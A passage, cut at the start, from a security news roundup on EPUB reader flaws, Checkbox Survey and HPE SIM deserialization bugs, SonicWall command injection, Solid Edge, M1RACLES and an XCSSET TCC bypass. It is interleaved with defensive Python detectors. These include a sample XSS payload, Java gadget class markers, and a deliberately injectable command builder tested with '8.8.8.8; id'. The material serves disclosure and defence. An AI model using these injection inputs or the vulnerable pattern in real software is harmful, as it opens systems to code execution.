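  <img src="cover.png" onerror="alert(1)"/>
  <a href="javascript:void(0)">next</a>
</body></html>""")
    return buf.getvalue()


def content_documents(z: zipfile.ZipFile):
    """Walk container.xml -> package document -> manifest and yield the archive
    paths of the XHTML content documents, i.e. what the browser engine renders."""
    container = ET.fromstring(z.read("META-INF/container.xml"))
    rootfile = container.find(f".//{{{NS_CONTAINER}}}rootfile")
    opf_path = rootfile.get("full-path")
    base = opf_path.rsplit("/", 1)[0] + "/" if "/" in opf_path else ""
    package = ET.fromstring(z.read(opf_path))
    for item in package.iter(f"{{{NS_OPF}}}item"):
        if item.get("media-type") == "application/xhtml+xml":
            yield base + item.get("href")


def scan_epub(data: bytes) -> list:
    """Return (document path, finding) pairs for scripting constructs that a
    reading system must strip or confine to a sandbox before rendering."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for path in content_documents(z):
            root = ET.fromstring(z.read(path))
            for el in root.iter():
                if el.tag.rsplit("}", 1)[-1] == "script":
                    findings.append((path, "script element"))
                for attr, value in el.attrib.items():
                    if attr.lower().startswith("on"):
                        findings.append((path, f"inline handler {attr}"))
                    elif attr in ("href", "src") and JS_URI.match(value):
                        findings.append((path, f"javascript: URI in {attr}"))
    return findings


if __name__ == "__main__":
    for path, finding in scan_epub(build_sample_epub()):
        print(f"{path}: {finding}")
```

A reading system that relies on a browser engine would apply the same idea in reverse: rather than scanning, it configures the engine so that script is disabled or sandboxed for EPUB content and file:// access from that content is refused, which is the kind of practical guideline Franken calls for below.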
 
"Of course, the significance depends on the platform that is used; e-readers generally won't contain sensitive files, while smartphones could contain private pictures," Franken told The Daily Swig. The team also carried out a manual evaluation of the most popular EPUB reading applications on Amazon Kindle, Apple Books, and the EPUBReader browser extension - and found several flaws.

"For instance, the Amazon Kindle does not allow an EPUB to execute embedded JavaScript. Nevertheless, this can be circumvented by a creative attacker through an input validation issue. The embedded scripts could then exploit a publicly known vulnerability of the Kindle's outdated web engine to gain access to documents in the user's library," Franken explained.

Vulnerabilities were also discovered in Apple Books, available pre-installed on macOS, and in the Windows version of Adobe Digital Editions. 

"Fortunately, the developers of Amazon, Apple, and Adobe were very responsive to our bug reports and were eager to fix the issues. Secondly, we argue that practical guidelines on how to handle the security and privacy aspects of developing an EPUB reading application would greatly aid developers. Ideally, this would include guidelines on how to correctly configure popular browser engines, such that important security policies prevent an EPUB from gaining too much [many] privileges,” Franken concluded.

An Advisory Issued by Carnegie Mellon University Warns Against the Vulnerability in Checkbox Survey

The CERT Coordination Center (CERT/CC) at Carnegie Mellon University has issued an advisory about a Checkbox Survey vulnerability, reportedly exploited in the wild, that could allow a remote attacker to execute arbitrary code without authentication.

Checkbox Survey is a customizable online survey tool written in ASP.NET that lets organizations build professional surveys that respondents can open from any desktop or mobile device.

The vulnerability, tracked as CVE-2021-27852, stems from insecure deserialization of View State data, the mechanism ASP.NET Web Forms uses to persist a page's state across postbacks.

Microsoft stated that “When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field or fields.”

Before version 7.0, Checkbox Survey implemented its own View State handling: it accepted a _VSTATE request argument and deserialized it with LosFormatter.

“Checkbox Survey before version 7.0 insecurely deserializes ASP.NET View State data, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable server,” the advisory reads.

Because the Checkbox Survey code handles this data itself instead of going through the framework, the server's ASP.NET View State Message Authentication Code (MAC) setting is never applied. Without a MAC, an attacker can submit arbitrary serialized data that the server deserializes, which leads to code execution.

The advisory further states that “Checkbox Survey is an ASP.NET application that can add survey functionality to a website. Before version 7.0, Checkbox Survey implements its View State functionality by accepting a _VSTATE argument, which it then deserializes using Los Formatter. Because this data is manually handled by the Checkbox Survey code, the ASP.NET View State Message Authentication Code (MAC) setting on the server is ignored. Without MAC, an attacker can create arbitrary data that will be deserialized, resulting in arbitrary code execution.” 

The impact is that a remote, unauthenticated attacker can execute arbitrary code with the privileges of the web server process by sending a crafted request to a server running Checkbox Survey 6.x.

Checkbox Survey 7.0 and later no longer use View State data and are therefore not affected. Installations older than version 7.0 should be upgraded or removed.

Checkbox has also said it no longer maintains Checkbox Survey 6, so that version is not safe to use. Anyone who cannot upgrade to an unaffected Checkbox Survey version should at least remove the software from every machine on which it is installed.

HPE Patches the Zero-Day Vulnerability in Systems Insight Manager Software for Windows

Hewlett Packard Enterprise (HPE) has released a security update to patch a critical zero-day remote code execution (RCE) vulnerability in its HPE Systems Insight Manager (SIM) software for Windows that it initially disclosed in December 2020.

HPE updated its original security advisory on Wednesday, although the SIM hotfix update kit that resolves the flaw was published more than a month earlier, on April 20. HPE SIM is a management and remote support automation tool for Windows and Linux intended for use with the company's servers, storage, and networking products, including HPE ProLiant Gen10 and Gen9.

Security researchers rated the flaw (CVE-2020-7200) as extremely high risk. It allows unauthenticated attackers to execute code remotely, affects HPE SIM 7.6.x, and is specific to the Windows version. The bug permits low-complexity attacks that require no user interaction.

“This module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain remote code execution as the administrative user running HPE SIM,” according to Packet Storm. The lack of proper validation of user-supplied data can lead to the deserialization of untrusted data, enabling attackers to execute code on servers running vulnerable SIM software.
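Java deserialization attacks of this kind leave two recognizable traces in a request: the ObjectOutputStream header (0xACED0005) and the class names of the gadget chain, which Java serialization writes as plain length-prefixed strings. The following is an added example, not HPE's code or the Metasploit module: a detector that scans request bodies (raw or base64-wrapped, as serialized objects often travel inside form fields, AMF or SOAP) for that header and for Commons Collections gadget classes. The request bodies are constructed for the example; the "serialized object" is deliberately truncated after the class descriptor and is a signature, not a working payload.

```python
import base64
import re
import struct

# ObjectOutputStream header: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5).
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Class names that appear verbatim (as length-prefixed UTF strings) inside the
# common Commons Collections gadget chains; none belongs in legitimate traffic.
GADGET_MARKERS = (
    b"org.apache.commons.collections.functors.InvokerTransformer",
    b"org.apache.commons.collections.functors.ChainedTransformer",
    b"org.apache.commons.collections4.functors.InvokerTransformer",
    b"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
)

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def candidate_blobs(body: bytes):
    """Yield the body itself and the decoded form of any base64 run inside it."""
    yield body
    for m in B64_RUN.finditer(body):
        try:
            yield base64.b64decode(m.group(0), validate=True)
        except ValueError:      # binascii.Error is a ValueError: not really base64
            continue


def inspect_request(body: bytes) -> dict:
    """Classify one request body: does it carry a Java serialized stream, and does
    that stream name known gadget classes?"""
    result = {"serialized": False, "gadgets": []}
    for blob in candidate_blobs(body):
        if JAVA_SERIAL_MAGIC not in blob:
            continue
        result["serialized"] = True
        for marker in GADGET_MARKERS:
            name = marker.decode()
            if marker in blob and name not in result["gadgets"]:
                result["gadgets"].append(name)
    return result


def _fake_serialized_object(class_name: bytes) -> bytes:
    """Constructed: the first bytes of a serialized object of the given class
    (stream header, TC_OBJECT, TC_CLASSDESC, UTF class name), then nothing else."""
    return JAVA_SERIAL_MAGIC + b"\x73\x72" + struct.pack(">H", len(class_name)) + class_name


# Constructed sample request bodies (not captured traffic).
BENIGN = b'{"query":"proliant gen10","scope":"federated"}'
RAW_SERIALIZED = _fake_serialized_object(b"org.apache.commons.collections.functors.InvokerTransformer")
BASE64_WRAPPED = b"payload=" + base64.b64encode(RAW_SERIALIZED)


if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("raw", RAW_SERIALIZED), ("base64", BASE64_WRAPPED)):
        print(label, inspect_request(body))
```

A stream header without a gadget marker is still worth alerting on for an endpoint that is not expected to receive serialized Java objects at all; the marker list only raises confidence and would need extending for other gadget libraries.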

HPE has also published mitigation measures for system admins who cannot deploy the CVE-2020-7200 security update on vulnerable systems. They involve removing the "Federated Search" and "Federated CMS Configuration" features through which the vulnerability is reached.

System admins who use HPE SIM can block CVE-2020-7200 attacks with the following procedure:

1. Stop HPE SIM Service 

2. Delete file from sim installed path del /Q /F C:\Program Files\HP\Systems Insight Manager\jboss\server\hpsim\deploy\simsearch.war 

3. Restart HPE SIM Service

4. Wait for HPE SIM web page "https://SIM_IP:50000" to be accessible and execute the following command from command prompt. mxtool -r -f tools\multi-cms-search.xml 1>nul 2>nul

Following the procedure above protects admins from exploitation by potential attackers, but it also means HPE SIM users can no longer use the federated search feature.

SonicWall Urges Customers to 'immediately' Patch NSM On-Prem Bug

SonicWall urges customers to “immediately” patch a post-authentication vulnerability that impacts on-premises versions of the Network Security Manager (NSM) multi-tenant firewall management solution.

CVE-2021-20026 affects NSM 2.2.0-R10-H1 and earlier, and SonicWall patched it in NSM 2.2.1-R6 and 2.2.1-R6 (Enhanced). SonicWall gives it a severity rating of 8.8/10; authenticated attackers can use it for OS command injection in low-complexity attacks that require no user interaction.

SonicWall stated, "This critical vulnerability potentially allows a user to execute commands on a device's operating system with the highest system privileges (root). This vulnerability only impacts on-premises NSM deployments, SaaS versions of NSM are not affected."
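SonicWall has not published where in NSM the injection sits, so the following is an added example of the bug class rather than of this bug: a hypothetical network-diagnostic handler on a management appliance that splices a logged-in user's target host into a shell command, beside the hardened version that validates the input as an IP literal or host name and passes it as its own argv element with no shell at all. This is not SonicWall's code.

```python
import ipaddress
import re

# RFC 1123 host name: labels of letters, digits and interior hyphens, dot-separated.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_diag_command_vulnerable(target: str) -> str:
    """Anti-pattern: splice an authenticated user's input into a shell command line.
    Handed to a shell, "8.8.8.8; id" runs id with the service's privileges, which
    on an appliance management daemon is typically root."""
    return f"ping -c 3 {target}"


def validate_target(target: str) -> str:
    """Accept an IPv4/IPv6 literal or a DNS host name; reject everything else outright.
    Neither form can start with '-', so the value cannot be parsed as an option either."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME.match(target):
        return target
    raise ValueError(f"invalid target: {target!r}")


def build_diag_command_hardened(target: str) -> list:
    """Validated input passed as a separate argv element: no shell, no metacharacters.
    Run it with subprocess.run(argv) (shell=False, the default)."""
    return ["ping", "-c", "3", validate_target(target)]


if __name__ == "__main__":
    print(build_diag_command_vulnerable("8.8.8.8; id"))   # shell would run both commands
    print(build_diag_command_hardened("8.8.8.8"))
    try:
        build_diag_command_hardened("8.8.8.8; id")
    except ValueError as e:
        print(e)
```

Validation and the argv form are complementary: argv alone stops shell metacharacters but not option injection or oversized input, and validation alone is fragile if some later code path rebuilds a command string. The post-authentication qualifier in SonicWall's advisory lowers the bar only slightly on a multi-tenant management console, where many operators hold valid credentials.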

SonicWall is urging customers to patch immediately, even though the company did not mention any imminent threat of exploitation or in-the-wild attacks.

"SonicWall customers who are running the on-premises NSM versions listed below should upgrade to the patched version as soon as possible," the company advised. 

When asked for comment by Bleeping Computer, SonicWall declined to say whether CVE-2021-20026 is being actively exploited and instead pointed to the information in the security advisory.

Several SonicWall appliance vulnerabilities have been targeted by threat actors this year. Many of them are zero-days that were actively exploited in the wild before the company released fixes. SonicWall fixed an actively exploited zero-day vulnerability affecting the SMA 100 series of SonicWall networking devices in February. 

A financially motivated threat actor, tracked by Mandiant analysts as UNC2447, exploited another zero-day in SonicWall SMA 100 series VPN appliances to deploy the newly discovered FiveHands ransomware on the networks of North American and European targets.

In January, the same zero-day was exploited in attacks targeting SonicWall's internal systems and was afterwards exploited indiscriminately in the wild. In March, SonicWall patched three more zero-days found exploited in the wild, affecting the company's on-premises and hosted Email Security (ES) products.

These zero-days were abused by a group tracked as UNC2682 to backdoor systems with BEHINDER web shells, which allowed the attackers to move laterally through their victims' networks and access emails and files, as Mandiant found while investigating the attacks.

Solid Edge: Solid Modeling Software Affected by Vulnerabilities

Siemens published a customer advisory on Tuesday, May 25, about several serious vulnerabilities affecting its Solid Edge product. The flaws originate in third-party software that many other organizations also use.

“The Solid Edge installation package includes a specific version of the third-party product KeyShot from Luxion, which may not contain the latest security fixes provided by Luxion. Siemens recommends updating KeyShot according to the information in the Luxion Security Advisory LSA-394129,” read the advisory released by Siemens. 

Security researcher Andrea Micalizzi, who has found numerous flaws in industrial systems in recent years, discovered the Solid Edge issues last year. They have been documented in advisories from Trend Micro's Zero Day Initiative (ZDI) and the US Cybersecurity and Infrastructure Security Agency (CISA).

Solid Edge is 3D CAD solid modeling software that uses parametric and synchronous technology. It runs on Microsoft Windows and offers mechanical engineers solid modeling, assembly modeling, and 2D orthographic view functionality.

Micalizzi found five vulnerabilities affecting the product: four serious memory corruption flaws that allow remote code execution and one medium-severity XML external entity (XXE) issue that could lead to information disclosure. The vulnerabilities can be triggered by getting the targeted user to open a malicious CATPart, 3DXML, STP, PRT, or JT file.

Analysis of the vulnerabilities showed that they were introduced through KeyShot, a 3D rendering and animation product made by Luxion. Further analysis showed that the root cause lies in Datakit CrossCad/Ware, a library that KeyShot uses to import various CAD (computer-aided design) file formats.

CrossCAD/Ware is used by a wide range of products, yet so far only Siemens, KeyShot's vendor Luxion, and CISA have published advisories for the issues.

On May 12, ZDI also published advisories with a "0day" status for each of the vulnerabilities because they were reportedly still unpatched.

The Zero Day notice read as “This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Solid Edge Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. A specific flaw exists within the parsing of JT files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process.” 

Datakit, however, reported that it had resolved the issues in April with version 2021.2 of CrossCAD/Ware. The company has encouraged software vendors to upgrade to version 2021.2, as earlier versions remain affected, and advised users of affected applications to avoid opening untrusted files from unverified senders.

Luxion published KeyShot 10.2, which contains the patched version of the Datakit library, and Siemens has urged users in Solid Edge to upgrade KeyShot according to the security advisory instructions given by Luxion.

M1RACLES Bug Impacts Apple M1 Chips

A security researcher has identified the first vulnerability in Apple M1 chips that would require a silicon redesign to fix. The good news is that the flaw is considered low risk; even the researcher who found it considers it insignificant and has tried not to overstate the problem in presenting his findings.

The vulnerability was codenamed M1RACLES and is currently tracked as CVE-2021-30747. It was discovered by Hector Martin, a software engineer at Asahi Linux, a project working on porting Linux to Mac devices.

In simplified terms, Martin explained that the vulnerability allows two apps running on the same device to exchange data through a hidden channel at the CPU level, bypassing memory, sockets, files, and the other standard operating system mechanisms. While the discovery is notable for the time, effort, knowledge, and skill needed to find bugs in a CPU's physical design, Martin states that the problem is of little use to attackers.

The only realistic abuse Martin can see is by dodgy advertising businesses, which could use an app already installed on a user's M1 device for cross-app tracking; a bizarre scenario, since the ad industry has many more reliable ways to collect data.

Even though the M1RACLES bug violates the OS security model by allowing one CPU process to send data to another over a covert channel, Martin believes the flaw was caused by a human error on Apple's M1 design team.

“Someone in Apple’s silicon design team made a boo-boo. It happens. Engineers are human,” he said. Martin added that he has informed Apple of his findings, but the company has yet to say whether the flaw will be fixed in future M1 silicon revisions. Martin disclosed and then debunked his own findings on a dedicated website that parodies similar sites created in the past to promote CPU vulnerabilities, many of which, like M1RACLES, were equally meaningless to most people's threat models.

Martin does note that on iOS the flaw could be used to defeat privacy protections: a malicious keyboard app could act as a keylogger by passing typed text to a second malicious app, which could then send it to the internet.

However, he suggests that because Apple restricts generating code at runtime, the company could detect exploitation attempts by subjecting App Store submissions to static analysis. Hypervisors disable guest access to the vulnerable register by default, so the flaw can be mitigated by running inside a virtual machine, but there are few other options, particularly on macOS.

Apple Fixes macOS Zero Day Vulnerability, Abused by XCSSET macOS Malware

Apple has released security updates for a variety of its products, including fixes for three zero-day vulnerabilities in macOS and tvOS. Among them is a fix for a zero-day that the XCSSET malware has exploited in the wild for nearly a year.

Apple said it was aware of reports that the security flaws "may have been actively exploited" in all three cases, but it did not give details about the attacks or the threat actors who might have exploited the zero-days.

WebKit on Apple TV 4K and Apple TV HD devices is affected by two of the three zero-days (CVE-2021-30663 and CVE-2021-30665). WebKit is the HTML rendering engine used by Apple's web browsers and applications across its desktop and mobile platforms, including iOS, macOS, tvOS, and iPadOS. Threat actors could use maliciously crafted web content to trigger the two vulnerabilities, which are memory corruption issues that allow arbitrary code execution on unpatched devices.

The third zero-day (CVE-2021-30713) is a permission issue found in the Transparency, Consent, and Control (TCC) framework that affects macOS Big Sur devices. The TCC framework is a macOS subsystem that prevents installed apps from accessing sensitive user information without asking the user for explicit permission via a pop-up message. A maliciously constructed application could be used to exploit this issue, bypassing Privacy settings and gaining access to sensitive user data. 

While Apple gave little detail on how the three zero-days were exploited in attacks, Jamf researchers found that the patched macOS zero-day (CVE-2021-30713) was being used by the XCSSET malware to get around Apple's TCC privacy protections.

According to the researchers, "the exploit in question could allow an attacker to gain Full Disk Access, Screen Recording, or other permissions without requiring the user's explicit consent — which is the default behavior." 

"We, the members of the Jamf Protect detection team, discovered this bypass being actively exploited during the additional analysis of the XCSSET malware, after noting a significant uptick of detected variants observed in the wild. The detection team noted that once installed on the victim’s system, XCSSET was using this bypass specifically for the purpose of taking screenshots of the user’s desktop without requiring additional permissions." 

Trend Micro's Mac Threat Response and Mobile Research teams first detected XCSSET in August 2020. According to the Jamf researchers, the vulnerability can be used to give malicious applications permissions such as Full Disk Access and Screen Recording, which in turn lets threat actors take screenshots of affected Macs.
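TCC records its grants in a SQLite database, so the first question an incident responder asks after a report like Jamf's is which clients currently hold Full Disk Access or Screen Recording. The following is an added example, not Jamf's or Apple's code: an audit that lists allowed grants for those two services from a TCC-style database, with an allowlist for the clients an organization expects. The database here is constructed in memory with a reduced `access` table; the column names (service, client, client_type, auth_value) and the service identifiers follow the Big Sur schema as an assumption, and on a real Mac the system database lives under /Library/Application Support/com.apple.TCC/ and needs root plus Full Disk Access to read. This does not detect the bypass itself; it shows which grants exist on the machine, which is where an investigation of permissions obtained without consent starts.

```python
import sqlite3

# TCC services behind the two permissions named in the Jamf write-up.
WATCHED_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceScreenCapture": "Screen Recording",
}
AUTH_ALLOWED = 2   # auth_value of an allowed grant in the Big Sur schema (0 = denied); assumed


def build_sample_tcc_db() -> sqlite3.Connection:
    """Constructed stand-in for TCC.db with a reduced `access` table carrying
    only the columns this audit reads. Rows are invented for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE access (
        service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,
        auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL, last_modified INTEGER NOT NULL)""")
    rows = [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, 1622000000),
        ("kTCCServiceScreenCapture", "us.zoom.xos", 0, 2, 2, 1622000000),
        ("kTCCServiceScreenCapture", "com.example.editor", 0, 0, 2, 1622000000),   # denied
        ("kTCCServiceSystemPolicyAllFiles", "/Users/demo/Library/Caches/.x/agent", 1, 2, 2, 1622000000),
    ]
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


def allowed_clients(conn: sqlite3.Connection, allowlist=frozenset()) -> list:
    """Return (permission, client, client_type) for every allowed grant of a watched
    service whose client is not on the reviewer's allowlist. client_type 1 means the
    client is identified by filesystem path instead of bundle ID, which deserves a
    closer look on a user machine."""
    placeholders = ",".join("?" * len(WATCHED_SERVICES))
    cur = conn.execute(
        f"SELECT service, client, client_type FROM access "
        f"WHERE service IN ({placeholders}) AND auth_value = ? ORDER BY service, client",
        (*WATCHED_SERVICES, AUTH_ALLOWED),
    )
    return [(WATCHED_SERVICES[s], c, t) for s, c, t in cur if c not in allowlist]


if __name__ == "__main__":
    # On a real Mac, open the system TCC.db read-only instead of the sample:
    # sqlite3.connect("file:/Library/Application Support/com.apple.TCC/TCC.db?mode=ro", uri=True)
    expected = {"com.apple.Terminal", "us.zoom.xos"}
    for permission, client, client_type in allowed_clients(build_sample_tcc_db(), expected):
        print(f"{permission}: {client} (client_type={client_type})")
```

Run periodically and diffed against a baseline, the output surfaces new Full Disk Access or Screen Recording grants, including ones that arrive by way of a parent application's permissions rather than a prompt the user remembers answering.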

Last month, Trend Micro discovered a new XCSSET variant updated to run on the newly launched Apple-designed ARM Macs. The CVE-2021-30713 vulnerability was disclosed shortly after Craig Federighi, Apple's head of software, stated that macOS has an "unacceptable" level of malware, which he attributed to the diversity of software sources.

Earlier this month, Apple addressed two iOS zero-days in the WebKit engine that allowed arbitrary remote code execution (RCE) on vulnerable devices merely by visiting malicious websites. Apple has also been releasing fixes for a string of other zero-days exploited in the wild in recent months, including one resolved in macOS in April and several iOS vulnerabilities resolved in the preceding months.